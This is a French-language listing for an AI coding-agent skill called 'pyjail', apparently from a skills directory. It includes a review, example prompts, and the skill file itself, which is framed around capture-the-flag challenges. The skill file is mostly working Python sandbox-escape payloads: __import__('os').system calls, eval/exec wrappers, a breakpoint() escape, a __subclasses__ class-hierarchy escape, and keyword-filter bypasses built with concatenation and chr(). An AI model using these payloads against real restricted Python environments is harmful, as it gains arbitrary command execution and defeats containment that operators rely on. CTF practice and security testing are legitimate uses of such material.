Évasion de prison Python

VérifiéPrudence

Techniques pour échapper aux restrictions des sandboxes Python. Utilisez ceci dans des environnements eval/exec restreints ou des challenges de jail.

Spar Skills Guide Bot
SecuriteAvancé
1023/07/2026
Claude Code
#python#sandbox-escape#jail#security#payloads

Recommandé pour

Notre avis

Ce skill permet d'échapper aux restrictions d'un environnement Python sandboxé (jail) en utilisant des techniques de contournement de filtres et d'accès aux modules interdits.

Points forts

  • Propose des techniques de contournement classiques comme l'utilisation de la hiérarchie de classes.
  • Inclut des références détaillées (bypass.md, payloads.md) pour aller plus loin.
  • Fournit une aide au débogage pour trouver les indices de classes utiles.

Limites

  • Les indices de classes varient selon les versions de Python, nécessitant une adaptation.
  • Ne couvre pas tous les types de filtres (caractères interdits, longueur limitée).
  • Suppose que l'environnement permet encore l'évaluation de code Python.
Quand l'utiliser

Utilisez ce skill lorsque vous devez exécuter des commandes ou lire des fichiers dans un environnement Python avec des restrictions de type 'jail'.

Quand l'éviter

Ne l'utilisez pas si les restrictions sont trop strictes (pas d'accès à eval/exec, filtres très restrictifs) ou si vous n'êtes pas dans un contexte de sandbox Python.

Analyse de sécurité

Prudence
Score qualité85/100

The skill provides a variety of Python code snippets for escaping restricted eval/exec environments, which can lead to arbitrary command execution. While intended for legitimate security testing, such capabilities are powerful and could cause harm if used inappropriately.

Points d'attention
  • enables arbitrary command execution via Python's os.system and other escapes
  • could be used to bypass security restrictions in production if misused

Exemples

Basic jail escape
I have a Python jail that allows eval but blocks '__import__' and 'os'. How can I run a system command to read 'flag.txt'?
Bypass keyword filters
The jail blocks the word 'system' and 'import'. Help me construct a payload using concatenation or chr() to execute 'cat flag.txt'.
Find class index for subclasses
I need to use the class hierarchy to access subclasses and find one with 'popen' or 'wrap' to execute commands. Show me how to enumerate and find the right index.

name: pyjail description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges. allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')

Reference Files

| Topic | Reference | |-------|-----------| | Bypass Techniques | reference/bypass.md | | Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)
Skills similaires